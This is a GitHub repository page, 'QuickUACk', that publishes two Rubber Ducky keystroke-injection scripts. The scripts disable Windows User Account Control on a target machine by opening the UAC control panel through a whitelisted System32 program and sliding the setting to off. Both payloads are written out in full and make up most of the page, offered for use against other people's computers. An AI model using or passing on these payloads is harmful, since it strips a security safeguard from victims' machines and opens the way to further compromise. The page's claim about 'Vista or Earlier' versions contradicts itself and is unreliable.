Skip to content

SappohSamaWorkshop/QuickUACk

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
 
 
 
 
 
 

Repository files navigation

QuickUACk!

Some of my antiUAC Scripts for Rubbber Ducky

A pair of fast solutions to disable UAC (User Account Control)
it works on all windows version 32 and 64 bits with uac (Vista or Earlier)
and are valid for all languages (Latin, of course).

The scripts were created with the Italian keyboard,
so I do not exclude that in some cases they require minor adjustments.
if the target machine is old, I recommend extending the delay time.


alt text


Ver 1.0 uses a .exe application from the C: \ Windows \ System32 (system protected) folder,
to start the uac on-screen control and switch to the uac panel.
the C: \ Windows \ SysWOW64 folder for the purpose or other protected system folders that contain exe are also fine.
Several applications contained in System32 are good, but be careful because there are some exceptions.
You can consult this list to see the applications that are whitelisted by default
and therefore do not require uac checking to be performed:

https://github.com/JonnyBanana/UAC-System32-Whitelisted-App-List


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

QuickUACk Ver. 1.0

DELAY 2000
CTRL ESC
DELAY 200
REM start C:\Windows\System32\AdapterTroubleshooter.exe
REM work on all windows version 32 and 64 bit
REM no reboot is required for disabling
STRING AdapterTroubleshooter
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

QuickUACk Ver. 2.0

DELAY 2000
CTRL ESC
DELAY 200
REM opens directly the User Account Control Panel
REM work on all windows version 32 and 64 bit with uac (Vista or Earlier)
REM no reboot is required for disabling
STRING UAC
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


About

Some of my antiUAC Scripts for Rubbber Ducky

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages